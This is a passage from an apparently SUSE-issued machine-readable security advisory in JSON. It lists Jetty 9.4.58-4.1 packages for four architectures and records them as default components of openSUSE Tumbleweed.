"product_id": "jetty-start-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-util-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-util-9.4.58-4.1.aarch64",
"product_id": "jetty-util-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-util-ajax-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-util-ajax-9.4.58-4.1.aarch64",
"product_id": "jetty-util-ajax-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-webapp-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-webapp-9.4.58-4.1.aarch64",
"product_id": "jetty-webapp-9.4.58-4.1.aarch64"
}
},
{
"category": "product_version",
"name": "jetty-xml-9.4.58-4.1.aarch64",
"product": {
"name": "jetty-xml-9.4.58-4.1.aarch64",
"product_id": "jetty-xml-9.4.58-4.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "jetty-annotations-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-annotations-9.4.58-4.1.ppc64le",
"product_id": "jetty-annotations-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-ant-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-ant-9.4.58-4.1.ppc64le",
"product_id": "jetty-ant-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-cdi-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-cdi-9.4.58-4.1.ppc64le",
"product_id": "jetty-cdi-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-client-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-client-9.4.58-4.1.ppc64le",
"product_id": "jetty-client-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-continuation-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-continuation-9.4.58-4.1.ppc64le",
"product_id": "jetty-continuation-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-deploy-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-deploy-9.4.58-4.1.ppc64le",
"product_id": "jetty-deploy-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-fcgi-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-fcgi-9.4.58-4.1.ppc64le",
"product_id": "jetty-fcgi-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-http-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-http-9.4.58-4.1.ppc64le",
"product_id": "jetty-http-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-http-spi-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-http-spi-9.4.58-4.1.ppc64le",
"product_id": "jetty-http-spi-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-io-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-io-9.4.58-4.1.ppc64le",
"product_id": "jetty-io-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-jaas-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-jaas-9.4.58-4.1.ppc64le",
"product_id": "jetty-jaas-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-jaspi-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-jaspi-9.4.58-4.1.ppc64le",
"product_id": "jetty-jaspi-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-jmx-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-jmx-9.4.58-4.1.ppc64le",
"product_id": "jetty-jmx-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-jndi-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-jndi-9.4.58-4.1.ppc64le",
"product_id": "jetty-jndi-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-jsp-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-jsp-9.4.58-4.1.ppc64le",
"product_id": "jetty-jsp-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-minimal-javadoc-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-minimal-javadoc-9.4.58-4.1.ppc64le",
"product_id": "jetty-minimal-javadoc-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-openid-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-openid-9.4.58-4.1.ppc64le",
"product_id": "jetty-openid-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-plus-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-plus-9.4.58-4.1.ppc64le",
"product_id": "jetty-plus-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-project-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-project-9.4.58-4.1.ppc64le",
"product_id": "jetty-project-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-proxy-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-proxy-9.4.58-4.1.ppc64le",
"product_id": "jetty-proxy-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-quickstart-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-quickstart-9.4.58-4.1.ppc64le",
"product_id": "jetty-quickstart-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-rewrite-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-rewrite-9.4.58-4.1.ppc64le",
"product_id": "jetty-rewrite-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-security-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-security-9.4.58-4.1.ppc64le",
"product_id": "jetty-security-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-server-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-server-9.4.58-4.1.ppc64le",
"product_id": "jetty-server-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-servlet-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-servlet-9.4.58-4.1.ppc64le",
"product_id": "jetty-servlet-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-servlets-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-servlets-9.4.58-4.1.ppc64le",
"product_id": "jetty-servlets-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-start-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-start-9.4.58-4.1.ppc64le",
"product_id": "jetty-start-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-util-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-util-9.4.58-4.1.ppc64le",
"product_id": "jetty-util-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-util-ajax-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-util-ajax-9.4.58-4.1.ppc64le",
"product_id": "jetty-util-ajax-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-webapp-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-webapp-9.4.58-4.1.ppc64le",
"product_id": "jetty-webapp-9.4.58-4.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jetty-xml-9.4.58-4.1.ppc64le",
"product": {
"name": "jetty-xml-9.4.58-4.1.ppc64le",
"product_id": "jetty-xml-9.4.58-4.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "jetty-annotations-9.4.58-4.1.s390x",
"product": {
"name": "jetty-annotations-9.4.58-4.1.s390x",
"product_id": "jetty-annotations-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-ant-9.4.58-4.1.s390x",
"product": {
"name": "jetty-ant-9.4.58-4.1.s390x",
"product_id": "jetty-ant-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-cdi-9.4.58-4.1.s390x",
"product": {
"name": "jetty-cdi-9.4.58-4.1.s390x",
"product_id": "jetty-cdi-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-client-9.4.58-4.1.s390x",
"product": {
"name": "jetty-client-9.4.58-4.1.s390x",
"product_id": "jetty-client-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-continuation-9.4.58-4.1.s390x",
"product": {
"name": "jetty-continuation-9.4.58-4.1.s390x",
"product_id": "jetty-continuation-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-deploy-9.4.58-4.1.s390x",
"product": {
"name": "jetty-deploy-9.4.58-4.1.s390x",
"product_id": "jetty-deploy-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-fcgi-9.4.58-4.1.s390x",
"product": {
"name": "jetty-fcgi-9.4.58-4.1.s390x",
"product_id": "jetty-fcgi-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-http-9.4.58-4.1.s390x",
"product": {
"name": "jetty-http-9.4.58-4.1.s390x",
"product_id": "jetty-http-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-http-spi-9.4.58-4.1.s390x",
"product": {
"name": "jetty-http-spi-9.4.58-4.1.s390x",
"product_id": "jetty-http-spi-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-io-9.4.58-4.1.s390x",
"product": {
"name": "jetty-io-9.4.58-4.1.s390x",
"product_id": "jetty-io-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-jaas-9.4.58-4.1.s390x",
"product": {
"name": "jetty-jaas-9.4.58-4.1.s390x",
"product_id": "jetty-jaas-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-jaspi-9.4.58-4.1.s390x",
"product": {
"name": "jetty-jaspi-9.4.58-4.1.s390x",
"product_id": "jetty-jaspi-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-jmx-9.4.58-4.1.s390x",
"product": {
"name": "jetty-jmx-9.4.58-4.1.s390x",
"product_id": "jetty-jmx-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-jndi-9.4.58-4.1.s390x",
"product": {
"name": "jetty-jndi-9.4.58-4.1.s390x",
"product_id": "jetty-jndi-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-jsp-9.4.58-4.1.s390x",
"product": {
"name": "jetty-jsp-9.4.58-4.1.s390x",
"product_id": "jetty-jsp-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-minimal-javadoc-9.4.58-4.1.s390x",
"product": {
"name": "jetty-minimal-javadoc-9.4.58-4.1.s390x",
"product_id": "jetty-minimal-javadoc-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-openid-9.4.58-4.1.s390x",
"product": {
"name": "jetty-openid-9.4.58-4.1.s390x",
"product_id": "jetty-openid-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-plus-9.4.58-4.1.s390x",
"product": {
"name": "jetty-plus-9.4.58-4.1.s390x",
"product_id": "jetty-plus-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-project-9.4.58-4.1.s390x",
"product": {
"name": "jetty-project-9.4.58-4.1.s390x",
"product_id": "jetty-project-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-proxy-9.4.58-4.1.s390x",
"product": {
"name": "jetty-proxy-9.4.58-4.1.s390x",
"product_id": "jetty-proxy-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-quickstart-9.4.58-4.1.s390x",
"product": {
"name": "jetty-quickstart-9.4.58-4.1.s390x",
"product_id": "jetty-quickstart-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-rewrite-9.4.58-4.1.s390x",
"product": {
"name": "jetty-rewrite-9.4.58-4.1.s390x",
"product_id": "jetty-rewrite-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-security-9.4.58-4.1.s390x",
"product": {
"name": "jetty-security-9.4.58-4.1.s390x",
"product_id": "jetty-security-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-server-9.4.58-4.1.s390x",
"product": {
"name": "jetty-server-9.4.58-4.1.s390x",
"product_id": "jetty-server-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-servlet-9.4.58-4.1.s390x",
"product": {
"name": "jetty-servlet-9.4.58-4.1.s390x",
"product_id": "jetty-servlet-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-servlets-9.4.58-4.1.s390x",
"product": {
"name": "jetty-servlets-9.4.58-4.1.s390x",
"product_id": "jetty-servlets-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-start-9.4.58-4.1.s390x",
"product": {
"name": "jetty-start-9.4.58-4.1.s390x",
"product_id": "jetty-start-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-util-9.4.58-4.1.s390x",
"product": {
"name": "jetty-util-9.4.58-4.1.s390x",
"product_id": "jetty-util-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-util-ajax-9.4.58-4.1.s390x",
"product": {
"name": "jetty-util-ajax-9.4.58-4.1.s390x",
"product_id": "jetty-util-ajax-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-webapp-9.4.58-4.1.s390x",
"product": {
"name": "jetty-webapp-9.4.58-4.1.s390x",
"product_id": "jetty-webapp-9.4.58-4.1.s390x"
}
},
{
"category": "product_version",
"name": "jetty-xml-9.4.58-4.1.s390x",
"product": {
"name": "jetty-xml-9.4.58-4.1.s390x",
"product_id": "jetty-xml-9.4.58-4.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "jetty-annotations-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-annotations-9.4.58-4.1.x86_64",
"product_id": "jetty-annotations-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-ant-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-ant-9.4.58-4.1.x86_64",
"product_id": "jetty-ant-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-cdi-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-cdi-9.4.58-4.1.x86_64",
"product_id": "jetty-cdi-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-client-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-client-9.4.58-4.1.x86_64",
"product_id": "jetty-client-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-continuation-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-continuation-9.4.58-4.1.x86_64",
"product_id": "jetty-continuation-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-deploy-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-deploy-9.4.58-4.1.x86_64",
"product_id": "jetty-deploy-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-fcgi-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-fcgi-9.4.58-4.1.x86_64",
"product_id": "jetty-fcgi-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-http-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-http-9.4.58-4.1.x86_64",
"product_id": "jetty-http-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-http-spi-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-http-spi-9.4.58-4.1.x86_64",
"product_id": "jetty-http-spi-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-io-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-io-9.4.58-4.1.x86_64",
"product_id": "jetty-io-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-jaas-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-jaas-9.4.58-4.1.x86_64",
"product_id": "jetty-jaas-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-jaspi-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-jaspi-9.4.58-4.1.x86_64",
"product_id": "jetty-jaspi-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-jmx-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-jmx-9.4.58-4.1.x86_64",
"product_id": "jetty-jmx-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-jndi-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-jndi-9.4.58-4.1.x86_64",
"product_id": "jetty-jndi-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-jsp-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-jsp-9.4.58-4.1.x86_64",
"product_id": "jetty-jsp-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-minimal-javadoc-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-minimal-javadoc-9.4.58-4.1.x86_64",
"product_id": "jetty-minimal-javadoc-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-openid-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-openid-9.4.58-4.1.x86_64",
"product_id": "jetty-openid-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-plus-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-plus-9.4.58-4.1.x86_64",
"product_id": "jetty-plus-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-project-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-project-9.4.58-4.1.x86_64",
"product_id": "jetty-project-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-proxy-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-proxy-9.4.58-4.1.x86_64",
"product_id": "jetty-proxy-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-quickstart-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-quickstart-9.4.58-4.1.x86_64",
"product_id": "jetty-quickstart-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-rewrite-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-rewrite-9.4.58-4.1.x86_64",
"product_id": "jetty-rewrite-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-security-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-security-9.4.58-4.1.x86_64",
"product_id": "jetty-security-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-server-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-server-9.4.58-4.1.x86_64",
"product_id": "jetty-server-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-servlet-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-servlet-9.4.58-4.1.x86_64",
"product_id": "jetty-servlet-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-servlets-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-servlets-9.4.58-4.1.x86_64",
"product_id": "jetty-servlets-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-start-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-start-9.4.58-4.1.x86_64",
"product_id": "jetty-start-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-util-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-util-9.4.58-4.1.x86_64",
"product_id": "jetty-util-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-util-ajax-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-util-ajax-9.4.58-4.1.x86_64",
"product_id": "jetty-util-ajax-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-webapp-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-webapp-9.4.58-4.1.x86_64",
"product_id": "jetty-webapp-9.4.58-4.1.x86_64"
}
},
{
"category": "product_version",
"name": "jetty-xml-9.4.58-4.1.x86_64",
"product": {
"name": "jetty-xml-9.4.58-4.1.x86_64",
"product_id": "jetty-xml-9.4.58-4.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-annotations-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-annotations-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-annotations-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-annotations-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-annotations-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.s390x"
},
"product_reference": "jetty-annotations-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-annotations-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-annotations-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-ant-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-ant-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-ant-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-ant-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-ant-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.s390x"
},
"product_reference": "jetty-ant-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-ant-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-ant-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-cdi-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-cdi-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-cdi-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-cdi-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-cdi-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.s390x"
},
"product_reference": "jetty-cdi-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-cdi-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-cdi-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-client-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-client-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-client-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-client-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-client-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-client-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-client-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-client-9.4.58-4.1.s390x"
},
"product_reference": "jetty-client-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-client-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-client-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-client-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-continuation-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-continuation-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-continuation-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-continuation-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-continuation-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.s390x"
},
"product_reference": "jetty-continuation-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-continuation-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-continuation-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-deploy-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-deploy-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-deploy-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-deploy-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-deploy-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.s390x"
},
"product_reference": "jetty-deploy-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-deploy-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-deploy-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-fcgi-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-fcgi-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-fcgi-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-fcgi-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-fcgi-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
